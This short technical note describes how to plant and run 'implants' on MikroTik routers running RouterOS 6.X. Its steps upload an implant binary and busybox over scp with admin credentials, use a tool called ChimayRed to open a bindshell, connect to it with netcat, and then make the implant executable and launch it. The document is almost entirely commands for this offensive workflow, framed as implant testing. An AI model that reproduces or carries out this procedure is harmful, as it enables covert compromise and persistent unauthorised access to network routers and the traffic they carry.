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Working with MikroTik RouterOS 6.X
This work was done specifically with the MikroTik Cloud Core Router CCR-1016G which is described more on this page. However, this article is more about working with RouterOS 6.X and should be hardware agnostic.
Many of the previous access methods in RouterOS (i.e. devel login) have been closed with RouterOS 6.X, so this is how I test implants with RouterOS 6.X:
Upload binaries to target using scp and admin user credentials. Note: the root of scp is chrooted to /flash/rw/pckg:
scp implant admin@router-ip:/ -
Upload a full featured busybox with the implant to /flash/rw/pckg
scp busybox-ARCH admin@router-ip:/ - Use ChimayRed to get a bindshell (see ChimayRed help from command line)
Netcat to the ChimayRed enabled bindshell
nc router-ip <port> -
From the bindshell, make binaries executable, execute implant(s), and perform diagnostics:
cd /flash/rw/pckg chmod +x implant chmod +x busybox ./implant ./busybox ls -lrt ./busybox ps | ./busybox grep implant